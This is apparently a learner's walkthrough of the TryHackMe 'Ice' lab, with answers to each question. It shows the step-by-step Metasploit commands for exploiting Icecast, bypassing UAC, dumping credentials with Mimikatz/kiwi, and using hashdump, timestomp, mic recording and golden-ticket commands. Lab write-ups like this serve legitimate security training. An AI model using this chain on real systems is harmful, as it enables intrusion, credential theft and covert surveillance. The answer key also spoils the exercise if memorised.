# Ice

> Shay Pasvolsky
> Started: sep 19, 2020
> Finished: sep 19, 2020

## General info

```bash
# export MIP=10.10.116.185
export MIP=10.10.252.3
export MyIP=10.9.134.47
```

### Users

1. U: 'Dark' P: 'Password01!'

## Tools

1. None

## Log Files

1. *nmap:*
   1. results is output of:

        ```bash
        sudo nmap -sS -vvv -p- $MIP -oN nmapres/results.txt
        ```

   2. results-vuln is outpu of:

        ```bash
        sudo nmap -sC -sV -vvv $MIP -script vuln -oN nmapres/reults-vuln
        ```

   3. a
2. a

## Tasks

### Task 1

1. Connect to our network using OpenVPN. Here is a mini walkthrough of connecting:

    ```txt
    Hit 'Completed'
    ```

2. Use an OpenVPN client to connect. In my example I am on Linux, on the access page we have a windows tutorial.

    ```txt
    Hit 'Completed'
    ```

3. You can verify you are connected by looking on your access page. Refresh the page

    ```txt
     Hit 'Completed'
    ```

4. Now when you deploy material, you will see an internal IP address of your Virtual Machine.

    ```txt
    Hit 'Completed'
    ```

### Task 2

Hit 'Deploy'

1. Deploy the machine! This may take up to three minutes to start.

    ```txt
    Hit 'Completed'
    ```

2. Launch a scan against our target machine, I recommend using a SYN scan set to scan all ports on the machine. The scan command will be provided as a hint, however, it's recommended to complete the room 'RP: Nmap' prior to this room.

    ```bash
    mkdir nmpares
    sudo nmap -sS -vvv -p- $MIP -oN nmapres/results.txt
    ```

    ```txt
    Hit 'Completed'
    ```

3. Once the scan completes, we'll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?

    ```txt
    3389
    ```

4. What service did nmap identify as running on port 8000? (First word of this service)

    ```txt
    Icecast
    ```

5. What does Nmap identify as the hostname of the machine? (All caps for the answer)

    ```bash
    sudo nmap -sC -sV -vvv $MIP
    ```

    ```txt
    Dark-PC
    ```

### Task 3

1. Now that we've identified some interesting services running on our target machine, let's do a little bit of research into one of the weirder services identified: Icecast. Icecast, or well at least this version running on our target, is heavily flawed and has a high level vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use [https://www.cvedetails.com](https://www.cvedetails.com) for this question and the next.

    ```txt
    Execute Code Overflow
    ```

2. What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

    ```txt
    cve-2004-1561
    ```

3. Now that we've found our vulnerability, let's find our exploit. For this section of the room, we'll use the Metasploit module associated with this exploit. Let's go ahead and start Metasploit using the command `msfconsole`

    ```txt
    Hit 'Completed'
    ```

4. After Metasploit has started, let's search for our target exploit using the command 'search icecast'. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in 'RP: Metasploit' which is recommended to be completed prior to this room, although not entirely necessary.

    ```txt
    exploit/windows/http/icecast_header
    ```

5. Let's go ahead and select this module for use. Type either the command `use icecast` or `use 0` to select our search result.

    ```txt
    Hit 'Completed'
    ```

6. Following selecting our module, we now have to check what options we have to set. Run the command `show options`. What is the only required setting which currently is blank?

    ```txt
    RHOSTS
    ```

7. First let's check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let's set that last option to our target IP. Now that we have everything ready to go, let's run our exploit using the command `exploit`

    ```bash
    msfconsole
    ```

    ```metasploit
    use icecast
    show options
    set RHOSTS Target_MIP
    set LHOST My_IP
    exploit
    ```

    ```txt
    Hit 'Completed'
    ```

### Task 4

1. Woohoo! We've gained a foothold into our victim machine! What's the name of the shell we have now?

    ```txt
    meterpreter
    ```

2. What user was running that Icecast process? The commands used in this question and the next few are taken directly from the 'RP: Metasploit' room.

    ```meatsploit
    getuid
    ```

    ```txt
    Dark
    ```

3. What build of Windows is the system?

    ```metasploit
    sysinfo
    ```

    ```txt
    7601
    ```

4. Now that we know some of the finer details of the system we are working with, let's start escalating our privileges. First, what is the architecture of the process we're running?

    ```txt
    x64
    ```

5. Now that we know the architecture of the process, let's perform some further recon. While this doesn't work the best on x64 machines, let's now run the following command `run post/multi/recon/local_exploit_suggester`. *This can appear to hang as it tests exploits and might take several minutes to complete*

    ```txt
    Hit 'Completed'
    ```

6. Running the local exploit suggester will return quite a few results for potential escalation exploits. What is the full path (starting with exploit/) for the first returned exploit?

    ```txt
    exploit/windows/local/bypassuac_eventvwr
    ```

7. Now that we have an exploit in mind for elevating our privileges, let's background our current session using the command `background` or `CTRL + z`. Take note of what session number we have, this will likely be 1 in this case. We can list all of our active sessions using the command `sessions` when outside of the meterpreter shell.

    ```bash
    ctrl + z
    ```

    ```txt
    Session 1
    ```

8. Go ahead and select our previously found local exploit for use using the command `use FULL_PATH_FOR_EXPLOIT`

    ```bash
    use exploit/windows/local/bypassuac_eventvwr
    ```

    ```txt
    Hit 'Completed'
    ```

9. Local exploits require a session to be selected (something we can verify with the command `show options`), set this now using the command `set session SESSION_NUMBER`

    ```bash
    set session 1
    ```

    ```txt
    Hit 'Completed'
    ```

10. Now that we've set our session number, further options will be revealed in the options menu. We'll have to set one more as our listener IP isn't correct. What is the name of this option?

    ```txt
    LHOST
    ```

11. Set this option now. You might have to check your IP on the TryHackMe network using the command `ip addr`

    ```bash
    set LHOST $MyIP
    ```

    ```txt
    Hit 'Completed'
    ```

12. After we've set this last option, we can now run our privilege escalation exploit. Run this now using the command `run`. Note, this might take a few attempts and you may need to relaunch the box and exploit the service in the case that this fails.

    ```txt
    Hit 'Completed'
    ```

13. Following completion of the privilege escalation a new session will be opened. Interact with it now using the command `sessions SESSION_NUMBER`

    ```metasploit
    sessions 2
    ```

    ```txt
    Hit 'Completed'
    ```

14. We can now verify that we have expanded permissions using the command `getprivs`. What permission listed allows us to take ownership of files?

    From running the command:

    ```txt
    Enabled Process Privileges
    ==========================

    Name
    ----
    SeBackupPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeCreatePagefilePrivilege
    SeCreateSymbolicLinkPrivilege
    SeDebugPrivilege
    SeImpersonatePrivilege
    SeIncreaseBasePriorityPrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeLoadDriverPrivilege
    SeManageVolumePrivilege
    SeProfileSingleProcessPrivilege
    SeRemoteShutdownPrivilege
    SeRestorePrivilege
    SeSecurityPrivilege
    SeShutdownPrivilege
    SeSystemEnvironmentPrivilege
    SeSystemProfilePrivilege
    SeSystemtimePrivilege
    SeTakeOwnershipPrivilege
    SeTimeZonePrivilege
    SeUndockPrivilege
    ```

    The answere:

    ```txt
    SeTakeOwnershipPrivilege
    ```

### Task 5

1. Prior to further action, we need to move to a process that actually has the permissions that we need to interact with the lsass service, the service responsible for authentication within Windows. First, let's list the processes using the command `ps`. Note, we can see processes being run by NT AUTHORITY\SYSTEM as we have escalated permissions (even though our process doesn't).

    ```txt
    Hit 'Completed'
    ```

2. In order to interact with lsass we need to be 'living in' a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass. The printer spool service happens to meet our needs perfectly for this and it'll restart if we crash it! What's the name of the printer service?

    Mentioned within this question is the term 'living in' a process. Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.

    ```txt
    spoolsv.exe
    ```

3. Migrate to this process now with the command `migrate -N PROCESS_NAME`

    ```txt
    Hit 'Completed'
    ```

4. Let's check what user we are now with the command `getuid`. What user is listed?

    ```txt
    NT AUTHORITY\SYSTEM
    ```

5. Now that we've made our way to full administrator permissions we'll set our sights on looting. Mimikatz is a rather infamous password dumping tool that is incredibly useful. Load it now using the command `load kiwi` (Kiwi is the updated version of Mimikatz)

    ```txt
    Hit 'Completed'
    ```

6. Loading kiwi into our meterpreter session will expand our help menu, take a look at the newly added section of the help menu now via the command `help`.

    ```txt
    Hit 'Completed'
    ```

7. Which command allows up to retrieve all credentials?

    ```txt
    creds_all
    ```

8. Run this command now. What is Dark's password? Mimikatz allows us to steal this password out of memory even without the user 'Dark' logged in as there is a scheduled task that runs the Icecast as the user 'Dark'. It also helps that Windows Defender isn't running on the box ;) (Take a look again at the ps list, this box isn't in the best shape with both the firewall and defender disabled)

    ```txt
    Password01!
    ```

### Task 6

1. Before we start our post-exploitation, let's revisit the help menu one last time in the meterpreter shell. We'll answer the following questions using that menu.

    ```txt
    Hit 'Completed'
    ```

2. What command allows us to dump all of the password hashes stored on the system? We won't crack the Administrative password in this case as it's pretty strong (this is intentional to avoid password spraying attempts)

    ```txt
    hashdump
    ```

3. While more useful when interacting with a machine being used, what command allows us to watch the remote user's desktop in real time?

    ```txt
    screenshare
    ```

4. How about if we wanted to record from a microphone attached to the system?

    ```txt
    record_mic
    ```

5. To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don't ever do this on a pentest unless you're explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.

    ```txt
    timestomp
    ```

6. Mimikatz allows us to create what's called a `golden ticket`, allowing us to authenticate anywhere with ease. What command allows us to do this?

    Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.

    ```txt
    golden_ticket_create
    ```

7. One last thing to note. As we have the password for the user 'Dark' we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we'd likely kick whatever user is signed onto it off if we connect to it, however, it's always interesting to remote into machines and view them as their users do. If this hasn't already been enabled, we can enable it via the following Metasploit module: `run post/windows/manage/enable_rdp`

    ```txt
    Hit 'Completed'
    ```

### Task 7

1. a

    ```txt
    Hit 'Completed'
    ```
